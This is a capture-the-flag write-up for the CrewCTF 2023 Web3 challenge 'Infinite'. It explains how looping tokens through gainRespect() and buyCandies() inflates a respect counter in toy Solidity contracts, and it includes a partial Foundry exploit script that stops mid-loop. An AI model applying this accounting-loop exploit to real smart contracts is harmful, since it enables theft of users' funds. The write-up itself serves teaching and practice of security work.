2023 | CrewCTF | Web3



Infinite respect.

nc infinite.chal.crewc.tf 60001



  • To solve the challenge, we need to store more than 50 respect tokens in the fancyStore contract

    function isSolved() public view returns (bool) {
        return STORE.respectCount(CREW.receiver())>=50 ;
  • The respectToken and candyToken contracts do not contain any significant information, as they are simple ERC20 token contracts that allow the owner to call the mint() and burn() functions

  • The crewToken contract with a mint() function that can only be called once is the entry point

    function mint() external {
        require(!claimed , "already claimed");
        receiver = msg.sender;
        claimed = true;
        _mint(receiver, 1);
  • Next, we can exchange 1 crew token for 10 candies

    function verification() public payable{
        require(crew.balanceOf(msg.sender)==1, "You don't have crew tokens to verify");
        require(crew.allowance(msg.sender, address(this))==1, "You need to approve the contract to transfer crew tokens");
        crew.transferFrom(msg.sender, address(this), 1);
        candy.mint(msg.sender, 10);
  • The candy tokens can be exchanged for respect tokens through fancyStore.sellCandies() or localGang.gainRespect(). But these two functions have a slight difference. The sellCandies() function burns candy tokens and transfers the respect tokens stored in the contract to the msg.sender, while the gainRespect() function transfers the candy tokens from the msg.sender and mint respect tokens to msg.sender. Thus, the total supply of respect tokens can be increased through gainRespect(). Similarly, we can increase the total supply of candy tokens through fancyStore.buyCandies()

  • Starting with 10 candy tokens, we can first exchange them for 10 respect tokens and increase candyCount through localGang.gainRespect(). Then, buy 10 candies and increase respectCount through fancyStore.buyCandies(). At this point, we have obtained an additional 10 candies and transferred 10 respect tokens to the fancyStore contract XD Repeat these steps until STORE.respectCount(CREW.receiver()) reaches the desired threshold


/// forge script script/Infinite.s.sol --private-key $PRIVATE_KEY --rpc-url $RPC_URL --sig "run(address)" $INSTANCE_ADDR --broadcast
contract InfiniteScript is Script {

    function run(address instance) public {
        Setup setup = Setup(instance);
        crewToken crew = setup.CREW();
        respectToken respect = setup.RESPECT();
        candyToken candy = setup.CANDY();
        fancyStore store = setup.STORE();
        localGang gang = setup.GANG();


        crew.approve(address(store), 1);

        candy.approve(address(gang), 50);
        respect.approve(address(store), 50);
        for (uint i; i < 5; ++i) {



最后更新: 2023年7月10日 10:55:12
Contributors: YanhuiJessica
